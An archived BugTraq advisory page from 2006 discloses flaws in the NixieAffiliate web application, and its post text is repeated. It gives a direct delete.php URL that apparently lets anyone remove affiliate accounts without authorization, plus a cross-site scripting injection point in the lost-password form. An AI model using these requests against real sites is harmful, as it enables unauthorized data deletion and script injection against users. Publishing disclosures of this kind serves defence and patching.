BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
NixieAffiliate all version bypass admin and xss
Sep 16 2006 10:30PM
ali hackerz ir
NixieAffiliate all version
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
Bypass for delete any aff ID :>>
www.domain.com/NixieAffiliate/delete.php?id=1
Xss :>>
www.domain.com/NixieAffiliate/forms/lostpassword.php?error=[xss]
...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
Bypass for delete any aff ID :>>
www.domain.com/NixieAffiliate/delete.php?id=1
Xss :>>
www.domain.com/NixieAffiliate/forms/lostpassword.php?error=[xss]
...
[ more ]